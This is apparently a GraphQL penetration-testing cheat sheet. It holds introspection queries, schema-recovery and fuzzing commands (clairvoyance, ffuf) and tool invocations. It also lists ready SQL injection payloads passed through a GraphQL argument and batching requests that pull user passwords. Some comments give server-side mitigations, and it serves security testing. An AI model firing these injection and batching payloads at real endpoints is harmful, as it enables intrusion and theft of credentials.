GraphQL
Checklist
Versiones antiguas
# Full schema introspection document for older GraphQL servers.
# The `directives` selection asks for the legacy location flags
# (onOperation / onFragment / onField); servers that only expose the
# newer `locations` field reject this document with a validation error,
# in which case the "modern" variant of the query is the one to use.
# All four definitions (the query plus the three fragments) must be sent
# together as one document: the fragments are referenced by name.
query IntrospectionQuery {
__schema {
queryType { name }        # names of the root operation types
mutationType { name }
subscriptionType { name }
types {
...FullType               # every type in the schema, expanded below
}
directives {
name
description
args {
...InputValue
}
onOperation               # legacy directive-location flags (pre-`locations`)
onFragment
onField
}
}
}
# Describes one type. includeDeprecated: true also returns fields and
# enum values marked @deprecated, together with their deprecationReason.
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
# Describes one argument or input field, including its default value.
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
# Type reference. Each nested ofType unwraps one wrapping type (LIST or
# NON_NULL); this variant resolves references up to three wrappers deep.
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
Versiones modernas
# Full schema introspection document for current GraphQL servers.
# Differs from the legacy variant in two places: directives expose
# `locations` instead of onOperation / onFragment / onField, and TypeRef
# unwraps up to seven nested ofType levels.
# The query and its three fragments must be sent together as one document.
query IntrospectionQuery {
__schema {
queryType { name }        # names of the root operation types
mutationType { name }
subscriptionType { name }
types {
...FullType               # every type in the schema, expanded below
}
directives {
name
description
locations                 # where the directive may be applied
args {
...InputValue
}
}
}
}
# Describes one type. includeDeprecated: true also returns fields and
# enum values marked @deprecated, together with their deprecationReason.
fragment FullType on __Type {
kind
name
description
fields(includeDeprecated: true) {
name
description
args {
...InputValue
}
type {
...TypeRef
}
isDeprecated
deprecationReason
}
inputFields {
...InputValue
}
interfaces {
...TypeRef
}
enumValues(includeDeprecated: true) {
name
description
isDeprecated
deprecationReason
}
possibleTypes {
...TypeRef
}
}
# Describes one argument or input field, including its default value.
fragment InputValue on __InputValue {
name
description
type { ...TypeRef }
defaultValue
}
# Type reference. Each nested ofType unwraps one wrapping type (LIST or
# NON_NULL); seven levels cover any realistic nesting such as [[T!]!]!.
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
Obtener mutaciones (mutations)
# Lists every field of the mutation root type together with its arguments,
# their default values and (via TypeRef) their argument types. Useful when
# reviewing which state-changing operations a schema exposes and whether
# each of them is guarded by authorisation.
# Returns mutationType: null when the schema defines no mutations.
# The TypeRef fragment below must be sent in the same document.
query {
__schema {
mutationType {
name
fields {
name
args {
name
defaultValue
type {
...TypeRef
}
}
}
}
}
}
# Type reference. Each nested ofType unwraps one wrapping type (LIST or
# NON_NULL); seven levels cover any realistic nesting.
fragment TypeRef on __Type {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
ofType {
kind
name
}
}
}
}
}
}
}
}
Consultar campos (input fields) de un objeto
# Anonymous query: replace <object-name> with a type name taken from the
# schema (for example from the introspection output above).
# Note that inputFields is populated only for INPUT_OBJECT kinds; for
# object, scalar or enum types it comes back as null, in which case the
# type's `fields` selection is what describes it.
{
__type(name: "<object-name>") {
name
inputFields {
name
description
defaultValue
}
}
}
# GraphQL suggestions
# clairvoyance reconstructs a schema from the server's "Did you mean ...?"
# field suggestions when introspection is disabled.
#   -H   extra request header (e.g. authentication), -c 1 sends one request at a time,
#   -x   routes traffic through a local intercepting proxy on 127.0.0.1:8080,
#   --no-ssl presumably disables TLS verification for that proxied connection — confirm with --help,
#   -w   wordlist of candidate field/type names, -o the file the recovered schema is written to.
# Mitigation on the server side: disable field suggestions as well as introspection
# outside development; disabling introspection alone does not stop this technique.
clairvoyance -H "<header>: <value>" -c 1 -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
# Fuzzing queries
# Enumerates root query field names with ffuf: each entry of <wordlist.txt>
# replaces FUZZ inside the POST body `{"query":"query {FUZZ}"}`.
#   -mc all  keeps every HTTP status code (GraphQL errors usually still return 200),
#   -fr      drops responses whose body matches "Cannot query", the server's
#            unknown-field error, so the remaining responses are the candidate names,
#   -c       coloured output, -o/-of write an HTML report.
# The Authorization header is a placeholder for a real bearer token.
# From the defender's side this shows up as a burst of POSTs with near-identical
# bodies and error responses; rate limiting and non-verbose error messages in
# production reduce its effectiveness.
ffuf -u http://<target>/graphql -w <wordlist.txt>:FUZZ -X POST -d "{\"query\":\"query {FUZZ}\"}" -H "Authorization: Bearer <token>" -H "Content-Type: application/json" -c -mc all -fr "Cannot query" -o ffuf-fuzzing-graphql-queries.html -of html
# Union-based SQLi
{"query": "{user(username: \"x' UNION SELECT 1,2,3,4-- -\"){id,name,password}}"}
## MySQL / MariaDB
{"query": "{user(username: \"x' UNION SELECT 1,2,GROUP_CONCAT(table_name),4,5,6 FROM information_schema.tables WHERE table_schema=database()-- -\"){id,name,password}}"}
# JSON list-based batching
[
{"query":"{user(username: \"user\") {id,name,password}}"},
{"query":"{user(username: \"admin\") {id,name,password}}"},
{"query":"{user(username: \"root\") {id,name,password}}"}
]
# Query-name-based (alias) batching
{"query":"{
first: user(username:\"user\"){id,name,password}
second: user(username:\"admin\") {id,name,password}
third: user(username:\"root\") {id,name,password}
}"}
Herramientas
Clairvoyance
# Same clairvoyance invocation as in the "GraphQL suggestions" section, with the
# request concurrency left as a placeholder (-c <concurrent-requests>) instead of 1.
# -H adds a request header, -x sends traffic through a local proxy on 127.0.0.1:8080,
# -w is the wordlist of candidate names, -o the file the recovered schema is written to.
# --no-ssl presumably disables TLS verification for the proxied connection — confirm with --help.
clairvoyance -H "<header>: <value>" -c <concurrent-requests> -x "http://127.0.0.1:8080" --no-ssl -w <wordlist> -o schema.json http://<target>/graphql --progress
graphw00f
# graphw00f: -d detects whether <target> serves a GraphQL endpoint,
# -f fingerprints which server implementation (engine) is behind it,
# -t is the target URL.
main.py -d -f -t <target>
GraphQL Cop
# GraphQL Cop: runs its set of configuration audit checks against the
# endpoint given with -t and reports which ones are present.
graphql-cop.py -t <target>/graphql
GraphQLmap
# GraphQLmap: -u is the endpoint URL; the tool then opens an interactive
# session for exploring the schema and issuing queries against it.
graphqlmap.py -u <target>/graphql
InQL
GraphQL Voyager
Altair GraphQL Client
Wordlists